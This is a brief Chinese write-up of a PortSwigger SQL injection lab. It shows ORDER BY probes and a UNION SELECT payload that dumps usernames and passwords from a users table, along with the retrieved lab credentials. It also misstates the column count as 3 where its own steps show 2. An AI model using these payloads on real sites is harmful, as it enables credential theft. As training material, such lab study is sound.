burpsuite靶场----SQL注入8----从其他的表中获得敏感信息

burpsuite靶场----SQL注入8----从其他的表中获得敏感信息

靶场地址

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables

正式开始

1.点击这些标签

2.确定列数
' order by 2-- 没报错
' order by 3-- 报错
确定列数为3
3.根据提示The database contains a different table called users, with columns called username and password
' union select username,password from users--

administrator
a5cth1kur9y9l1u5yoaq
wiener
9l46twto61xhd1g6npe2
carlos
e4j7s18r97gc9qhbpatt
4.最后登录即可